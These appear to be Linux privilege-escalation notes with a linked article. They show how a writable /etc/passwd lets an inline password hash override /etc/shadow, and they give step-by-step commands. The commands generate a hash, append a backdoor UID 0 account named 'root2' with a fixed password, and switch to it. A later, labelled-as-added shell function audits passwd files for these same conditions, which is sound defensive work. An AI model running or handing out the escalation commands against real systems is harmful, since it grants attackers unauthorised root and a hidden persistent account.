cp /etc/passwd

For backwards compatibility, if a password hash is present in the second column of a /etc/passwd user record, it is considered valid for authentication and it takes precedence over the respective entry in /etc/shadow if available.

Check the permissions on /etc/passwd; the steps below require write access to it.

1. Generate a password hash:
   openssl passwd gori
2. Append a record that uses the hash (HASH is the output of step 1):
   echo "root2:HASH:0:0:root:/root:/bin/bash" >> /etc/passwd
3. Switch to the new user:
   su root2
   password: gori
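
A defender-side audit for the conditions described above, as an added example that is not part of the original notes: it flags records whose second field holds something other than a shadow placeholder, extra UID 0 accounts, and a passwd file writable by group or others. The function names, finding labels and sample records are constructed for this example.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for the conditions described above.
# Finding labels (INLINE_HASH, ...) are names chosen for this example.

audit_passwd() {
    file=${1:-/etc/passwd}
    findings=$(
        awk -F: '
            /^#/ || NF == 0 { next }
            # Field 2 empty: the account has no password at all.
            $2 == "" { print "EMPTY_PASSWORD " $1 }
            # Field 2 should be "x" (defer to /etc/shadow) or a "*"/"!" lock marker.
            $2 != "" && $2 != "x" && $2 !~ /^[*!]/ { print "INLINE_HASH " $1 }
            # Any UID 0 record besides root is a second superuser.
            $3 == 0 && $1 != "root" { print "EXTRA_UID0 " $1 }
        ' "$file"
        # Group- or world-writable file: any such user can append records.
        find "$file" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null |
            sed 's/^/WRITABLE_BY_NON_OWNER /'
    )
    if [ -z "$findings" ]; then return 0; fi
    printf '%s\n' "$findings"
    return 1
}

# Constructed sample records (not from a real system; the hash is a dummy string).
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
root2:$1$constructed$notarealhash:0:0:root:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
EOF
}

# Stand-alone use: sh audit_passwd.sh /etc/passwd
if [ "$#" -gt 0 ]; then audit_passwd "$1"; fi
```

The function returns non-zero when it prints any finding, so it can gate a scheduled check or a configuration-management run.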

https://medium.com/go-cyber/linux-privilege-escalation-with-suid-files-6119d73bc620
